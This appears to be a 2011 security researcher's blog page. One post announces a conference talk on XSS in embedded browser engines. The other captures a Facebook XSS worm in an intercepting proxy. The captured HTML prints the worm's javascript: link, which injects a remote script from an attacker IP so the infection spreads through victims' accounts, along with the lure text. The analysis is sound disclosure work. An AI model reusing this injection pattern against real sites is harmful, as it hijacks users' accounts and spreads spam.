Toorcon Seattle 2011, “XSS Without the Browser”
Posted by Kos on 06/19/2011 at 9:06 am | Last modified: 11/08/2011 6:06 pmToorcon Seattle 2011, “XSS Without the Browser” (PDF). Presentation I gave about embedded HTML/Javascript engines, and potential security risks with whe not implemented securely. An old Skype bug is used as an example.
Tags: conference, facebook, presentation, toorcon, xss | Categories: Hacking, Presentations, XSS | Comments (0) | Permalink
Facebook XSS
Posted by Kos on 04/06/2011 at 8:54 am | Last modified: 11/08/2011 6:05 pmSome cross-site scripting that was being spread on Facebook. I allowed myself to be compromised (for science!) and opened up a BURP instance beforehand. (Red link is to the actual javascript that sent out messages.)
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.144.114.105
X-Cnection: close
Date: Thu, 07 Apr 2011 05:49:39 GMT
Content-Length: 121182
*SNIP*
<div>
<div id="app205712022786034_permalink_header_alt" fbcontext="dc593d496581">
<div>
<a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><img src="http://i.imgur.com/dPewU.png" /></a>
</div>
<div>
<h2>Videos Posted by Maria Gonzales</h2>
<div>
<div>
</div>
</div>
</div>
</div>
<div id="app205712022786034_player" style="border: 0px none #ffffff;" fbcontext="dc593d496581">
<a href=" javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement('script')).src='[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; window.close(); }else{ document.body.appendChild(document.createElement('script')).src='[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; }" target="_blank" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>
</div>
<div id="app205712022786034_video_info" fbcontext="dc593d496581">
<div id="app205712022786034_video_metadata" fbcontext="dc593d496581">
<h3>Teacher Pushes Attacking Bully To The Ground</h3>
<div>
by <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">Maria Gonzales</a> (<a href="/video/?id=" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">videos</a>)
</div>
<div>
<strong>2:30</strong><br /><br />
</div>
</div>
<div id="app205712022786034_description" fbcontext="dc593d496581">
<div>
He should be commended, but sadly, in todays world, he'll probably get in trouble.
</div>
</div>
<a role="button" href="/ajax/share_dialog.php?s='11&appid=2392950137&p[]=487808128343&p[]=&p[]=" title="send this to friends or post it on your profile." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><span>Share</span></a>
<div id="app205712022786034_video_actions" fbcontext="dc593d496581">
<ul>
<li>
<div>
<a href="#" id="app205712022786034_lowqual_toggle" title="watch "bonaparte - menschen live (video) [hd]" in regular quality." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;" fbcontext="dc593d496581">
View in Regular Quality</a>
</div>
<a href="#" id="app205712022786034_highqual_toggle" title="watch "bonaparte - menschen live (video) [hd]" in high quality." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;" fbcontext="dc593d496581">View in High Quality</a>
</li>
<li><a href="/ajax/report.php?content_type='13&cid=487808128343&h=AQDMzuGzYxeiGADv" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">Report Video</a></li>
</ul>
</div>
</div>
*SNIP*
Tags: facebook, worm, xss | Categories: Hacking, XSS | Comments (0) | Permalink